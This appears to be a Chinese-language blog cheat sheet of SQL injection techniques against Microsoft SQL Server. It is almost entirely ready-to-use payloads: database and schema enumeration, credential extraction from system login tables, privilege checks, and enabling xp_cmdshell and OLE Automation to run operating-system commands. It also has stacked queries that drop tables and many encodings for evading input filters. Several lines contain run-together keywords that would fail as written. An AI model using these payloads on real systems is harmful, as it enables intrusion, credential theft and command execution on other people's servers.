
数据库的一些注入技巧-sqlserver

默认数据库
pubs
MSsql 2005版本以上不支持
model
支持所有版本
msdb
支持所有版本
tempdb
支持所有版本
northwind
支持所有版本
information_schema
支持MSSQL 2000及以上版本


注释
/*
--
;%00

SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password ='';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';

查询版本信息
@@VERSION

SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';


查询数据库凭证
Database..Table
master..syslogins, master..sysprocesses
Columns
name, loginame
Current  User
user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database  Credentials
SELECT user, password FROM master.dbo.sysxlogins

SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);

查询数据库信息
Database.Table
master..sysdatabases
Column
name
Current  DB
DB_NAME(i)

·      SELECT DB_NAME(5);
·      SELECT name FROM master..sysdatabases;

查询主机名称
@@SERVERNAME
SERVERPROPERTY()

SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');

查询表和列
确定列数
ORDER BY n+1;

漏洞语句:
SELECT username, password, permission FROM Users WHERE id = '1';

查询列数如下:
1' ORDER BY 1--
True
1'  ORDER BY 2--
True
1'  ORDER BY 3--
True
1'  ORDER BY 4--
False - Query is only using 3 columns
-1'  UNION SELECT 1,2,3--
True

查询列
GROUP BY / HAVING

漏洞语句:
SELECT username,password, permission FROM Users WHERE id = '1';
注入语句:
1' HAVING 1=1--
Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1'  GROUP BY username HAVING 1=1--
Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1'  GROUP BY username, password HAVING 1=1--
Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1'  GROUP BY username, password, permission HAVING 1=1--
No Error

查询表
从以下两个数据库中查询表信息:
information_schema.tables、master..sysobjects

联合查询
UNION SELECT name FROM  master..sysobjects WHERE xtype='U'

布尔查询
AND SELECT  SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'


报错查询
AND 1 = (SELECT TOP  1 table_name FROM information_schema.tables)
AND 1 = (SELECT TOP  1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT  TOP 1 table_name FROM information_schema.tables))

查询列
从以下两个数据库中查询列信息:
information_schema.columns 、 master..syscolumns

联合查询
UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')

布尔查询
AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'

报错查询
AND 1 = (SELECT TOP  1 column_name FROM information_schema.columns)
AND 1 = (SELECT TOP  1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT  TOP 1 column_name FROM information_schema.columns))

检索多个表/列
1、
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
2、
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);

3、
AND 1=0; DROP TABLE TMP_DB;

SQL Server 2005版本以上适用
SELECT table_name %2b ', ' FROM information_schema.tables FOR  XML PATH('')


储存过程查询:
' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

避免单引号
SELECT * FROM Users WHERE username = CHAR(97) +  CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

字符串拼接
SELECT CONCAT('a','a','a'); (SQL SERVER 2012)
SELECT 'a'+'d'+'mi'+'n';

条件判断
IF
CASE
IF 1=1 SELECT'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间注入
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';

执行命令
EXEC master.dbo.xp_cmdshell 'cmd';

mssql 2005默认禁用xp_cmdshell,用以下语句开启(需要sysadmin/serveradmin权限,否则sp_configure会失败):
EXEC sp_configure 'show advanced  options', 1
EXEC  sp_configure reconfigure
EXEC  sp_configure 'xp_cmdshell', 1
EXEC  sp_configure reconfigure

调用wscript执行命令:
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null,  '%systemroot%\system32\cmd.exe /c echo jumbo'
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:

EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure
例:
1、把命令结果存入tmp_db
' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
2、从tmp_db查询内容:
' UNION SELECT tbl FROM TMP_DB--

3、删除tmp_db
' DROP TABLE TMP_DB--

多语句查询
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');

混淆以下字符等同于空
01
02
03
04
05
06
07
08
09
0A
0B
0C
0D
0E
0F
10
11
12
13
14
15
16
17
18
19
1A
1B
1C
1D
1E
1F
20
25


S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
%仅限于ASP(x)环境

以下字符代替空格
22
"
28
(
29
)
5B
[
5D


UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];

and/or之后可以使用的符号
01 - 20
Range
21
!
2B
+
2D
-
2E
.
5C
\
7E
~


SELECT 1FROMWHERE\1=\1AND\1=\1;

编码
URL Encoding
SELECT  %74able_%6eame FROM information_schema.tables;

Double URL  Encoding
SELECT  %2574able_%256eame FROM information_schema.tables;

Unicode Encoding
SELECT  %u0074able_%u6eame FROM information_schema.tables;

Invalid Hex  Encoding (ASP)
SELECT  %tab%le_%na%me FROM information_schema.tables;

Hex Encoding
'  AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS  VARCHAR(4000)); EXEC (@S);--

HTML Entities  (Needs to be verified)
%26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B

